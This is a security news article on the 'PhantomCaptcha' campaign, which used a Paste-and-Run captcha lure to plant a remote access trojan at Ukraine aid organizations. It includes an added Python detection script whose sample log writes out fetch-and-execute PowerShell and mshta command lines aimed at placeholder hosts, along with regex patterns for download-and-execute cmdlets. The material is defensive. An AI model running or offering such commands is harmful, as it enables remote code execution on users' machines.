PhantomCaptcha RAT Assault Aims at Aid Organizations Assisting Ukraine

A sophisticated cyber operation, dubbed “PhantomCaptcha,” has targeted prominent humanitarian organizations and government entities engaged in war relief efforts in Ukraine, as detailed in recent research by SentinelLABS. The campaign has notably affected major organizations such as the International Red Cross, UNICEF, and the Norwegian Refugee Council, along with various Ukrainian governmental administrations in regions including Donetsk and Dnipropetrovsk.

This coordinated attack was initiated on October 8, 2025, following six months of meticulous infrastructure planning. Although the campaign was operational for just one day, its speed of execution suggests highly skilled perpetrators aiming to evade detection. The attack sequence exhibited characteristics similar to the patterns of COLDRIVER, a group associated with Russia’s FSB intelligence service.

Deceptive Communications and Malicious Payloads

The cyberattack commenced with well-crafted emails allegedly from the Ukrainian President’s Office, containing a malicious PDF file. Clicking a link embedded within this PDF redirected victims to zoomconference.app, a domain masquerading as a legitimate Zoom site. This domain, hosted on a server owned by a Russian provider in Finland, displayed a bogus Cloudflare captcha page designed to infect victims with a covert spying tool.

Further analysis revealed instructions in Ukrainian that prompted users to copy and paste a “token” into the Windows Run command. This tactic, widely known as Paste and Run, tricks users into executing malicious code themselves, often bypassing conventional security measures. The spying tool identified is a multi-stage, WebSocket-based Remote Access Trojan (RAT) that grants attackers remote access to the infected system for data exfiltration.
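As an added detection example (not code from the SentinelLABS report or from the campaign itself), the following Python triages process-creation records for launches consistent with a Paste-and-Run lure typed into the Windows Run dialog. The simplified log format, the explorer.exe-parent heuristic and every sample value are assumptions constructed for illustration.

```python
"""Triage process-creation records for Paste-and-Run launches.
Heuristic (an assumption, not from the report): a command typed into the Windows Run dialog
is spawned by explorer.exe; an interpreter child that fetches or decodes code is suspect."""
import re
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS = [  # (pattern, reason) checked against the child's command line
    (re.compile(r"https?://", re.I), "remote URL in command line"),
    (re.compile(r"-e(nc(odedcommand)?)?\s", re.I), "encoded PowerShell command"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|invoke-webrequest)\b", re.I), "download-and-execute cmdlet"),
]

@dataclass
class ProcEvent:
    parent: str   # parent image file name
    image: str    # child image file name
    cmdline: str  # child command line

def classify(ev: ProcEvent) -> list[str]:
    """Return why an event looks like Paste-and-Run; an empty list means no match."""
    if ev.parent.lower() != "explorer.exe" or ev.image.lower() not in INTERPRETERS:
        return []
    return [why for rx, why in SUSPICIOUS if rx.search(ev.cmdline)]

def parse_line(line: str) -> ProcEvent:
    """Parse one constructed key="value" record (a simplified format, not a real log schema)."""
    f = dict(re.findall(r'(\w+)="([^"]*)"', line))
    base = lambda p: p.rsplit("\\", 1)[-1]
    return ProcEvent(base(f["ParentImage"]), base(f["Image"]), f["CommandLine"])

# Constructed sample records; none of these values come from the report.
SAMPLE_LOG = [
    # Run dialog -> PowerShell pulling and executing remote code: candidate.
    r'''ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -w hidden -c iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/token'))"''',
    # Run dialog -> mshta fetching a remote HTA: candidate.
    r'''ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta https://example.invalid/verify.hta"''',
    # Run dialog -> encoded PowerShell (placeholder blob): candidate.
    r'''ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -nop -w hidden -enc aQBlAHgA"''',
    # Scheduled task running a local script; parent is not explorer.exe: not flagged here.
    r'''ParentImage="C:\Windows\System32\svchost.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"''',
]

def find_candidates(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (child image, reasons) for each record that trips the heuristic."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        if reasons := classify(ev):
            hits.append((ev.image, reasons))
    return hits
```

A Run-dialog launch of a plain console with no payload (for example cmd.exe alone) produces no reasons and is not reported, which keeps the heuristic from paging on ordinary administrator habits.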

Extensive Planning, Brief Execution

SentinelLABS’ research emphasizes that the attack showcased a high degree of operational planning. While the primary assault lasted merely 24 hours, the command-and-control servers remained active to sustain control over compromised systems. Such short-lived but highly targeted operations underscore the ongoing threat cyber campaigns pose to humanitarian groups, with a clear focus on obtaining sensitive data.

The researchers further noted associations with a separate mobile campaign deploying counterfeit Android applications, some disguising themselves as adult entertainment platforms or cloud storage services, aimed at harvesting diverse personal information such as users’ locations, SIM details, contacts, photographs, and lists of installed applications.

These incidents highlight the precarious position of relief organizations as direct targets of cyber activities. Employees must adopt a cautious approach towards unexpected communications and refrain from executing directives involving unknown tokens. Should a computer exhibit unusual behavior, it is critical to disconnect it from the network and obtain a professional evaluation.

In instances of such breaches, it is essential to report findings to national CERTs, rotate any compromised credentials, and conduct comprehensive system scans. Implementing foundational security controls, such as multi-factor authentication and restricted administrative rights, can significantly mitigate the risks of these attacks.
